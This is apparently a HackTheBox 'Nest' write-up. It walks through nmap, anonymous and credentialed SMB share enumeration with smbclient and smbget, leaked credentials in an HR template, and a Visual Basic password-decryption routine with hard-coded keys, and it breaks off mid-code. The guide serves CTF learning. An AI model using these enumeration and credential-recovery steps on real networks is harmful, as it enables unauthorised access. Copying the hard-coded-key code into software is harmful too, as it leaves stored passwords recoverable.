HackTheBox - Nest 🕊️🐣



Quick Summary

→ This machine is really good because it involves a lot of enumeration, especially with smbclient, and it needs a solid understanding of Active Directory. It is rated as an easy machine, but others call it medium because of a debug mode that gives beginners some trouble. Unlike other machines, on this one I never get a proper shell.


Penetration Testing Methodologies

  1. Network Scanning

    → Nmap scan

    → Discover open ports and which services are running

  2. Enumeration

    → Service enumeration

    → Enumerate SMB shares

    → In this phase there was a lot of SMB enumeration; different files were discovered inside the shares

    → Analyzing the retrieved content, the interesting files are RU_Config.xml and config.xml

  3. Post - Exploitation

    → Analyze how the password decryption works

    → Decrypt the password with dotnetfiddle

    → Running the script gives the password for the user

  4. Exploitation

    → Enumerate as the C.Smith user

    → Log in as C.Smith with SMB

    → Finally get user.txt

  5. Privilege Escalation

    → I initially came across Debug Mode Password.txt, which belongs to the HQK Reporting Service v1.2 running on port 4386

    → Enumerate HQK Reporting Service v1.2 with telnet, which gives a lot of information

    → Get and execute the .exe file – HqkLdap.exe gives the Administrator password

    → Finally get the root.txt flag, again with smbclient


Network Scanning

Walkthrough

→ I always begin with an Nmap scan to see which services are running. I always use:


  • -sV ⇒ probe open ports to determine service/version info
  • -sC ⇒ equivalent to --script=default
  • -A ⇒ aggressive scan (enables OS detection, version detection, script scanning and traceroute)
  • -oN ⇒ save the scan results to a text file

# bash

nmap -sV -sC -A 10.10.10.178 -oN nmap-Nest


# bash

root in ~/htb/Nest
❯ nmap -sV -sC -A 10.10.10.178 -oN nmap-Nest
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-22 08:26 PST
Nmap scan report for 10.10.10.178
Host is up (0.21s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista:icrosoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 Rndows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 o1%), Microsoft Windows Embedded Standard 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
4386/tcp open unknown
[snip]
| Help:
| Reporting Service V1.2
| This service allows users to run queries against databases using the legacy HQK format
| AVAILABLE COMMANDS ---
| LIST
| SETDIR <Directory_Name>
| RUNQUERY <Query_ID>
| DEBUG <Password>
|_ HELP <Command>
[snip]
Host script results:
|_clock-skew: 2m26s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-22T00:29:42
|_ start_date: 2020-03-21T23:00:50

TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 223.12 ms 10.10.14.1
2 223.23 ms 10.10.10.178

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.08 seconds

root in ~/htb/Nest took 1m52s



Nmap results

So there are only 2 open ports.

  • 445 ⇒ SMB (microsoft-ds)
  • 4386 ⇒ unknown to nmap, but the banner in the nmap results identifies it as the HQK Reporting Service

Enumeration

Since TCP/445 is open, we can take a look to see what shares are available:

# bash

root in htb/boxes/Nest
❯ smbclient -L \\\\10.10.10.178
Enter WORKGROUP\root's password:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
Secure$ Disk
Users Disk
SMB1 disabled -- no workgroup available

root in htb/boxes/Nest


The Data share seems to be accessible anonymously, so we can recursively list its contents with smbclient:

# bash

root in htb/boxes/Nest
❯ smbclient \\\\10.10.10.178\\Data
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
. D 0 Thu Aug 8 06:53:46 2019
.. D 0 Thu Aug 8 06:53:46 2019
IT D 0 Thu Aug 8 06:58:07 2019
Production D 0 Tue Aug 6 05:53:38 2019
Reports D 0 Tue Aug 6 05:53:44 2019
Shared D 0 Thu Aug 8 03:07:51 2019

\IT
NT_STATUS_ACCESS_DENIED listing \IT\*

\Production
NT_STATUS_ACCESS_DENIED listing \Production\*

\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*

\Shared
. D 0 Thu Aug 8 03:07:51 2019
.. D 0 Thu Aug 8 03:07:51 2019
Maintenance D 0 Thu Aug 8 03:07:32 2019
Templates D 0 Thu Aug 8 03:08:07 2019

\Shared\Maintenance
. D 0 Thu Aug 8 03:07:32 2019
.. D 0 Thu Aug 8 03:07:32 2019
Maintenance Alerts.txt A 48 Tue Aug 6 07:01:44 2019

\Shared\Templates
. D 0 Thu Aug 8 03:08:07 2019
.. D 0 Thu Aug 8 03:08:07 2019
HR D 0 Thu Aug 8 03:08:01 2019
Marketing D 0 Thu Aug 8 03:08:06 2019

\Shared\Templates\HR
. D 0 Thu Aug 8 03:08:01 2019
.. D 0 Thu Aug 8 03:08:01 2019
Welcome Email.txt A 425 Thu Aug 8 06:55:36 2019

\Shared\Templates\Marketing
. D 0 Thu Aug 8 03:08:06 2019
.. D 0 Thu Aug 8 03:08:06 2019
smb: \>




smb: \> cd \Shared\Templates\HR
smb: \Shared\Templates\HR\> ls
. D 0 Thu Aug 8 03:08:01 2019
.. D 0 Thu Aug 8 03:08:01 2019
Welcome Email.txt A 425 Thu Aug 8 06:55:36 2019

10485247 blocks of size 4096. 6543883 blocks available

smb: \Shared\Templates\HR\>

To list all the directories easily I use the command recurse on, and as you can see there are two potentially interesting files, Maintenance Alerts.txt and Welcome Email.txt. I download them with smbclient:

# bash

smb: \Shared\Templates\HR\> mget "Welcome Email.txt"
Get file Welcome Email.txt? y
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \Shared\Templates\HR\>

Then let's read the content of the .txt file:

# bash

root in htb/boxes/Nest
cat 'Welcome Email.txt'
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019


Thank you
HR
root in htb/boxes/Nest


Next is Maintenance Alerts.txt:

# bash

Current directory is \Shared\Templates\HR\
smb: \Shared\Templates\HR\> cd /
smb: \> cd \Shared\Maintenance
smb: \Shared\Maintenance\> ls
. D 0 Thu Aug 8 03:07:32 2019
.. D 0 Thu Aug 8 03:07:32 2019
Maintenance Alerts.txt A 48 Tue Aug 6 07:01:44 2019

10485247 blocks of size 4096. 6543883 blocks available
smb: \Shared\Maintenance\> mget "Maintenance Alerts.txt"
Get file Maintenance Alerts.txt? y
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \Shared\Maintenance\>

Then read the content :

# bash

root in htb/boxes/Nest
cat 'Maintenance Alerts.txt'
There is currently no scheduled maintenance work
root in htb/boxes/Nest


Not much of interest, so let's move on to the next phase.

Enumerating SMB Shares

Welcome Email.txt gives us the credentials of TempUser, so I'll try them with smbclient and see if they give any further access to the Data share:

# bash

root in htb/boxes/Nest
❯ smbclient \\\\10.10.10.178\\Data -U TempUser
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
. D 0 Thu Aug 8 06:53:46 2019
.. D 0 Thu Aug 8 06:53:46 2019
IT D 0 Thu Aug 8 06:58:07 2019
Production D 0 Tue Aug 6 05:53:38 2019
Reports D 0 Tue Aug 6 05:53:44 2019
Shared D 0 Thu Aug 8 03:07:51 2019

\IT
. D 0 Thu Aug 8 06:58:07 2019
.. D 0 Thu Aug 8 06:58:07 2019
Archive D 0 Tue Aug 6 06:33:58 2019
Configs D 0 Thu Aug 8 06:59:34 2019
Installs D 0 Thu Aug 8 06:08:30 2019
Reports D 0 Sun Jan 26 08:09:13 2020
Tools D 0 Tue Aug 6 06:33:43 2019

\Production
. D 0 Tue Aug 6 05:53:38 2019
.. D 0 Tue Aug 6 05:53:38 2019

\Reports
. D 0 Tue Aug 6 05:53:44 2019
.. D 0 Tue Aug 6 05:53:44 2019

\Shared
. D 0 Thu Aug 8 03:07:51 2019
.. D 0 Thu Aug 8 03:07:51 2019
Maintenance D 0 Thu Aug 8 03:07:32 2019
Templates D 0 Thu Aug 8 03:08:07 2019

\IT\Archive
. D 0 Tue Aug 6 06:33:58 2019
.. D 0 Tue Aug 6 06:33:58 2019

\IT\Configs
. D 0 Thu Aug 8 06:59:34 2019
.. D 0 Thu Aug 8 06:59:34 2019
Adobe D 0 Thu Aug 8 03:20:09 2019
Atlas D 0 Tue Aug 6 19:16:18 2019
DLink D 0 Tue Aug 6 21:25:27 2019
Microsoft D 0 Thu Aug 8 03:23:26 2019
NotepadPlusPlus D 0 Thu Aug 8 03:31:37 2019
RU Scanner D 0 Thu Aug 8 04:01:13 2019
Server Manager D 0 Tue Aug 6 21:25:19 2019

\IT\Installs
. D 0 Thu Aug 8 06:08:30 2019
.. D 0 Thu Aug 8 06:08:30 2019

\IT\Reports
. D 0 Sun Jan 26 08:09:13 2020
.. D 0 Sun Jan 26 08:09:13 2020

\IT\Tools
. D 0 Tue Aug 6 06:33:43 2019
.. D 0 Tue Aug 6 06:33:43 2019

\Shared\Maintenance
. D 0 Thu Aug 8 03:07:32 2019
.. D 0 Thu Aug 8 03:07:32 2019
Maintenance Alerts.txt A 48 Tue Aug 6 07:01:44 2019

\Shared\Templates
. D 0 Thu Aug 8 03:08:07 2019
.. D 0 Thu Aug 8 03:08:07 2019
HR D 0 Thu Aug 8 03:08:01 2019
Marketing D 0 Thu Aug 8 03:08:06 2019

\IT\Configs\Adobe
. D 0 Thu Aug 8 03:20:09 2019
.. D 0 Thu Aug 8 03:20:09 2019
editing.xml AH 246 Sat Aug 3 20:58:42 2019
Options.txt A 0 Tue Oct 11 05:11:14 2011
projects.xml A 258 Wed Jan 9 00:30:52 2013
settings.xml A 1274 Thu Aug 8 03:19:12 2019

\IT\Configs\Atlas
. D 0 Tue Aug 6 19:16:18 2019
.. D 0 Tue Aug 6 19:16:18 2019
Temp.XML A 1369 Wed Jun 11 15:38:22 2003

\IT\Configs\DLink
. D 0 Tue Aug 6 21:25:27 2019
.. D 0 Tue Aug 6 21:25:27 2019

\IT\Configs\Microsoft
. D 0 Thu Aug 8 03:23:26 2019
.. D 0 Thu Aug 8 03:23:26 2019
Options.xml A 4598 Sun Mar 4 03:24:24 2012

\IT\Configs\NotepadPlusPlus
. D 0 Thu Aug 8 03:31:37 2019
.. D 0 Thu Aug 8 03:31:37 2019
config.xml A 6451 Thu Aug 8 07:01:25 2019
shortcuts.xml A 2108 Thu Aug 8 03:30:27 2019

\IT\Configs\RU Scanner
. D 0 Thu Aug 8 04:01:13 2019
.. D 0 Thu Aug 8 04:01:13 2019
RU_config.xml A 270 Fri Aug 9 03:49:37 2019

\IT\Configs\Server Manager
. D 0 Tue Aug 6 21:25:19 2019
.. D 0 Tue Aug 6 21:25:19 2019

\Shared\Templates\HR
. D 0 Thu Aug 8 03:08:01 2019
.. D 0 Thu Aug 8 03:08:01 2019
Welcome Email.txt A 425 Thu Aug 8 06:55:36 2019

\Shared\Templates\Marketing
. D 0 Thu Aug 8 03:08:06 2019
.. D 0 Thu Aug 8 03:08:06 2019

10485247 blocks of size 4096. 6543883 blocks available
smb: \>


Looks like we now have access to some files in the IT directory. I recursively pull down all the files in the share:

# bash

root in htb/boxes/Nest
❯ smbget -R smb://10.10.10.178/Data/ -U TempUser
Password for [TempUser] connecting to //Data/10.10.10.178:
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Data//IT/Configs/Adobe/editing.xml
smb://10.10.10.178/Data//IT/Configs/Adobe/Options.txt
smb://10.10.10.178/Data//IT/Configs/Adobe/projects.xml
smb://10.10.10.178/Data//IT/Configs/Adobe/settings.xml
smb://10.10.10.178/Data//IT/Configs/Atlas/Temp.XML
smb://10.10.10.178/Data//IT/Configs/Microsoft/Options.xml
smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/config.xml
smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/shortcuts.xml
smb://10.10.10.178/Data//IT/Configs/RU Scanner/RU_config.xml
smb://10.10.10.178/Data//Shared/Maintenance/Maintenance Alerts.txt
smb://10.10.10.178/Data//Shared/Templates/HR/Welcome Email.txt
Downloaded 16.65kB in 95 seconds

root in htb/boxes/Nest took 1m34s
ls
IT 'Maintenance Alerts.txt' nmap-Nest Production Reports Shared 'Welcome Email.txt'

root in htb/boxes/Nest


When I went through the files one by one on my own machine I found interesting stuff: RU_config.xml and config.xml. The first one is located at /IT/Configs/RU Scanner/RU_config.xml:

# bash

root in htb/boxes/Nest
cd IT/Configs/

root in Nest/IT/Configs
ls
Adobe Atlas DLink Microsoft NotepadPlusPlus 'RU Scanner' 'Server Manager'

root in Nest/IT/Configs
cd 'RU Scanner'/

root in IT/Configs/RU Scanner
ls
RU_config.xml

root in IT/Configs/RU Scanner


And this is the content of the XML file:

# bash

root in IT/Configs/RU Scanner
cat RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>389</Port>
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
root in IT/Configs/RU Scanner


I thought I would use it to authenticate to the SMB shares, but authentication failed. So I think the password is encrypted, which means it needs to be decrypted first.

Next, config.xml:

# bash

root in IT/Configs/NotepadPlusPlus
cat config.xml
<?xml version="1.0" encoding="Windows-1252" ?>
<NotepadPlus>
<GUIConfigs>
<!-- 3 status : "large", "small" or "hide"-->
<GUIConfig name="ToolBar" visible="yes">standard</GUIConfig>
<!-- 2 status : "show" or "hide"-->
<GUIConfig name="StatusBar">show</GUIConfig>
<!-- For all attributs, 2 status : "yes" or "no"-->
<GUIConfig name="TabBar" dragAndDrop="yes" drawTopBar="yes" drawInactiveTab="yes" reduce="yes" closeButton="no" doubleClick2Close="no" vertical="no" multiLine="no" hide="no" />
<!-- 2 positions : "horizontal" or "vertical"-->
<GUIConfig name="ScintillaViewsSplitter">vertical</GUIConfig>
<!-- For the attribut of position, 2 status : docked or undocked ; 2 status : "show" or "hide" -->
<GUIConfig name="UserDefineDlg" position="undocked">hide</GUIConfig>
<GUIConfig name="TabSetting" size="4" replaceBySpace="no" />
<!--App position-->
<GUIConfig name="AppPosition" x="662" y="95" width="955" height="659" isMaximized="yes" />
<!-- For the primary scintilla view,
2 status for Attribut lineNumberMargin, bookMarkMargin, indentGuideLine and currentLineHilitingShow: "show" or "hide"
4 status for Attribut folderMarkStyle : "simple", "arrow", "circle" and "box" -->
<GUIConfig name="ScintillaPrimaryView" lineNumberMargin="show" bookMarkMargin="show" folderMarkStyle="box" indentGuideLine="show" currentLineHilitingShow="show" Wrap="yes" edge="no" edgeNbColumn="100" wrapSymbolShow="hide" zoom="0" whiteSpaceShow="hide" eolShow="hide" lineWrapMethod="aligned" zoom2="0" />
<!-- For the secodary scintilla view,
2 status for Attribut lineNumberMargin, bookMarkMargin, indentGuideLine and currentLineHilitingShow: "show" or "hide"
4 status for Attribut folderMarkStyle : "simple", "arrow", "circle" and "box" -->
<GUIConfig name="Auto-detection">yes</GUIConfig>
<GUIConfig name="CheckHistoryFiles">no</GUIConfig>
<GUIConfig name="TrayIcon">no</GUIConfig>
<GUIConfig name="RememberLastSession">yes</GUIConfig>
<!--
New Document default settings :
format = 0/1/2 -> win/unix/mac
encoding = 0/1/2/3/4/5 -> ANSI/UCS2Big/UCS2small/UTF8/UTF8-BOM
defaultLang = 0/1/2/..

Note 1 : UTF8-BOM -> UTF8 without BOM
Note 2 : for defaultLang :
0 -> L_TXT
1 -> L_PHP
... (see source file)
-->
<GUIConfig name="NewDocDefaultSettings" format="0" encoding="0" lang="0" codepage="-1" openAnsiAsUTF8="no" />
<GUIConfig name="langsExcluded" gr0="0" gr1="0" gr2="0" gr3="0" gr4="0" gr5="0" gr6="0" gr7="0" langMenuCompact="yes" />
<!--
printOption is print colour setting, the following values are possible :
0 : WYSIWYG
1 : Invert colour
2 : B & W
3 : WYSIWYG but without background colour
-->
<GUIConfig name="Print" lineNumber="no" printOption="0" headerLeft="$(FULL_CURRENT_PATH)" headerMiddle="" headerRight="$(LONG_DATE) $(TIME)" headerFontName="IBMPC" headerFontStyle="1" headerFontSize="8" footerLeft="" footerMiddle="-$(CURRENT_PRINTING_PAGE)-" footerRight="" footerFontName="" footerFontStyle="0" footerFontSize="9" margeLeft="0" margeTop="0" margeRight="0" margeBottom="0" />
<!--
Backup Setting :
0 : non backup
1 : simple backup
2 : verbose backup
-->
<GUIConfig name="Backup" action="0" useCustumDir="no" dir="" />
<GUIConfig name="TaskList">yes</GUIConfig>
<GUIConfig name="SaveOpenFileInSameDir">no</GUIConfig>
<GUIConfig name="noUpdate" intervalDays="15" nextUpdateDate="20080426">no</GUIConfig>
<GUIConfig name="MaitainIndent">yes</GUIConfig>
<GUIConfig name="MRU">yes</GUIConfig>
<GUIConfig name="URL">0</GUIConfig>
<GUIConfig name="globalOverride" fg="no" bg="no" font="no" fontSize="no" bold="no" italic="no" underline="no" />
<GUIConfig name="auto-completion" autoCAction="0" triggerFromNbChar="1" funcParams="no" />
<GUIConfig name="sessionExt"></GUIConfig>
<GUIConfig name="SmartHighLight">yes</GUIConfig>
<GUIConfig name="TagsMatchHighLight" TagAttrHighLight="yes" HighLightNonHtmlZone="no">yes</GUIConfig>
<GUIConfig name="MenuBar">show</GUIConfig>
<GUIConfig name="Caret" width="1" blinkRate="250" />
<GUIConfig name="ScintillaGlobalSettings" enableMultiSelection="no" />
<GUIConfig name="openSaveDir" value="0" defaultDirPath="" />
<GUIConfig name="titleBar" short="no" />
<GUIConfig name="DockingManager" leftWidth="200" rightWidth="200" topHeight="200" bottomHeight="266">
<FloatingWindow cont="4" x="39" y="109" width="531" height="364" />
<PluginDlg pluginName="dummy" id="0" curr="3" prev="-1" isVisible="yes" />
<PluginDlg pluginName="NppConverter.dll" id="3" curr="4" prev="0" isVisible="no" />
<ActiveTabs cont="0" activeTab="-1" />
<ActiveTabs cont="1" activeTab="-1" />
<ActiveTabs cont="2" activeTab="-1" />
<ActiveTabs cont="3" activeTab="-1" />
</GUIConfig>
</GUIConfigs>
<!-- The History of opened files list -->
<FindHistory nbMaxFindHistoryPath="10" nbMaxFindHistoryFilter="10" nbMaxFindHistoryFind="10" nbMaxFindHistoryReplace="10" matchWord="no" matchCase="no" wrap="yes" directionDown="yes" fifRecuisive="yes" fifInHiddenFolder="no" dlgAlwaysVisible="no" fifFilterFollowsDoc="no" fifFolderFollowsDoc="no" searchMode="0" transparencyMode="0" transparency="150">
<Find name="text" />
<Find name="txt" />
<Find name="itx" />
<Find name="iTe" />
<Find name="IEND" />
<Find name="redeem" />
<Find name="activa" />
<Find name="activate" />
<Find name="redeem on" />
<Find name="192" />
<Replace name="C_addEvent" />
</FindHistory>
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
</NotepadPlus>

root in IT/Configs/NotepadPlusPlus


Looking at the very bottom of config.xml I see something else interesting: someone was accessing files on the Secure$ share as well as files on the C.Smith user's desktop.

# bash

<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>


Post Exploitation

Enumerate TempUser

So let's see if we can access anything in this share as TempUser:

# bash

❯ smbclient \\\\10.10.10.178\\Secure$ -U TempUser
smb: \> recurse on
smb: \> ls
. D 0 Wed Aug 7 19:08:12 2019
.. D 0 Wed Aug 7 19:08:12 2019
Finance D 0 Wed Aug 7 15:40:13 2019
HR D 0 Wed Aug 7 19:08:11 2019
IT D 0 Thu Aug 8 06:59:25 2019
\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*
\HR
NT_STATUS_ACCESS_DENIED listing \HR\*
\IT
NT_STATUS_ACCESS_DENIED listing \IT\*

smb: \>

Interesting; it seems that TempUser cannot list any of the 3 directories, but ultimately I found that the IT\Carl\ folder was indeed listable:

# bash

root in htb/boxes/Nest
❯ smbclient \\\\10.10.10.178\\Secure$ -U TempUser
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> cd IT/Carl
smb: \IT\Carl\> recurse on
smb: \IT\Carl\> ls
. D 0 Thu Aug 8 03:42:14 2019
.. D 0 Thu Aug 8 03:42:14 2019
Docs D 0 Thu Aug 8 03:44:00 2019
Reports D 0 Tue Aug 6 21:45:40 2019
VB Projects D 0 Tue Aug 6 22:41:55 2019

\IT\Carl\Docs
. D 0 Thu Aug 8 03:44:00 2019
.. D 0 Thu Aug 8 03:44:00 2019
ip.txt A 56 Thu Aug 8 03:44:16 2019
mmc.txt A 73 Thu Aug 8 03:43:42 2019

\IT\Carl\Reports
. D 0 Tue Aug 6 21:45:40 2019
.. D 0 Tue Aug 6 21:45:40 2019

\IT\Carl\VB Projects
. D 0 Tue Aug 6 22:41:55 2019
.. D 0 Tue Aug 6 22:41:55 2019
Production D 0 Tue Aug 6 22:07:13 2019
WIP D 0 Tue Aug 6 22:47:41 2019

\IT\Carl\VB Projects\Production
. D 0 Tue Aug 6 22:07:13 2019
.. D 0 Tue Aug 6 22:07:13 2019

\IT\Carl\VB Projects\WIP
. D 0 Tue Aug 6 22:47:41 2019
.. D 0 Tue Aug 6 22:47:41 2019
RU D 0 Fri Aug 9 23:36:45 2019

\IT\Carl\VB Projects\WIP\RU
. D 0 Fri Aug 9 23:36:45 2019
.. D 0 Fri Aug 9 23:36:45 2019
RUScanner D 0 Thu Aug 8 06:05:54 2019
RUScanner.sln A 871 Tue Aug 6 22:45:36 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner
. D 0 Thu Aug 8 06:05:54 2019
.. D 0 Thu Aug 8 06:05:54 2019
bin D 0 Thu Aug 8 04:00:11 2019
ConfigFile.vb A 772 Thu Aug 8 06:05:09 2019
Module1.vb A 279 Thu Aug 8 06:05:44 2019
My Project D 0 Thu Aug 8 04:00:11 2019
obj D 0 Thu Aug 8 04:00:11 2019
RU Scanner.vbproj A 4828 Fri Aug 9 23:37:51 2019
RU Scanner.vbproj.user A 143 Tue Aug 6 20:55:27 2019
SsoIntegration.vb A 133 Thu Aug 8 06:05:58 2019
Utils.vb A 4888 Thu Aug 8 03:49:35 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\bin
. D 0 Thu Aug 8 04:00:11 2019
.. D 0 Thu Aug 8 04:00:11 2019
Debug D 0 Thu Aug 8 03:59:13 2019
Release D 0 Tue Aug 6 20:55:26 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\My Project
. D 0 Thu Aug 8 04:00:11 2019
.. D 0 Thu Aug 8 04:00:11 2019
Application.Designer.vb A 441 Tue Aug 6 20:55:13 2019
Application.myapp A 481 Tue Aug 6 20:55:13 2019
AssemblyInfo.vb A 1163 Tue Aug 6 20:55:13 2019
Resources.Designer.vb A 2776 Tue Aug 6 20:55:13 2019
Resources.resx A 5612 Tue Aug 6 20:55:13 2019
Settings.Designer.vb A 2989 Tue Aug 6 20:55:13 2019
Settings.settings A 279 Tue Aug 6 20:55:13 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\obj
. D 0 Thu Aug 8 04:00:11 2019
.. D 0 Thu Aug 8 04:00:11 2019
x86 D 0 Thu Aug 8 03:59:18 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Debug
. D 0 Thu Aug 8 03:59:13 2019
.. D 0 Thu Aug 8 03:59:13 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Release
. D 0 Tue Aug 6 20:55:26 2019
.. D 0 Tue Aug 6 20:55:26 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\obj\x86
. D 0 Thu Aug 8 03:59:18 2019
.. D 0 Thu Aug 8 03:59:18 2019

10485247 blocks of size 4096. 6544137 blocks available
smb: \IT\Carl\>


Looks like there is some source code written in Visual Basic. So I use smbget to recursively download the Secure$\IT\Carl directory for further analysis:

# bash

root in htb/boxes/Nest
❯ smbget -rR smb://10.10.10.178/Secure$/IT/Carl/ -U TempUser
Password for [TempUser] connecting to //Secure$/10.10.10.178:
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Secure$/IT/Carl//Docs/ip.txt
smb://10.10.10.178/Secure$/IT/Carl//Docs/mmc.txt
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/ConfigFile.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Module1.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.myapp
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.resx
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.settings
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/SsoIntegration.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Utils.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner.sln
Downloaded 0b in 12 seconds

root in htb/boxes/Nest 12s


So this is the whole directory I get:

# bash

root in WIP/RU/RUScanner
ls
bin ConfigFile.vb Module1.vb 'My Project' obj 'RU Scanner.vbproj' 'RU Scanner.vbproj.user' SsoIntegration.vb Utils.vb

root in WIP/RU/RUScanner


Looking at the .vb files, Module1.vb is responsible for retrieving the password from RU_Config.xml:

# bash

root in WIP/RU/RUScanner
cat Module1.vb
Module Module1

    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}

    End Sub

End Module

root in WIP/RU/RUScanner


And Utils.vb is responsible for decrypting the password:

# bash

root in WIP/RU/RUScanner
cat Utils.vb
Imports System.Text
Imports System.Security.Cryptography
Public Class Utils

    Public Shared Function GetLogFilePath() As String
        Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
    End Function

    ' Passphrase, salt, iteration count, IV and key size are all hard-coded here,
    ' so anyone with the source can decrypt every password the tool has ever stored.
    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function EncryptString(PlainString As String) As String
        If String.IsNullOrEmpty(PlainString) Then
            Return String.Empty
        Else
            Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Encrypt(ByVal plainText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                                   As String

        Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector)
        Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue)
        Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText)
        ' Rfc2898DeriveBytes is PBKDF2 with HMAC-SHA1; keySize / 8 bytes are taken as the AES key.
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)
        Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8))
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC
        Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes)
        Using memoryStream As New IO.MemoryStream()
            Using cryptoStream As New CryptoStream(memoryStream, _
                                                   encryptor, _
                                                   CryptoStreamMode.Write)
                cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length)
                cryptoStream.FlushFinalBlock()
                Dim cipherTextBytes As Byte() = memoryStream.ToArray()
                memoryStream.Close()
                cryptoStream.Close()
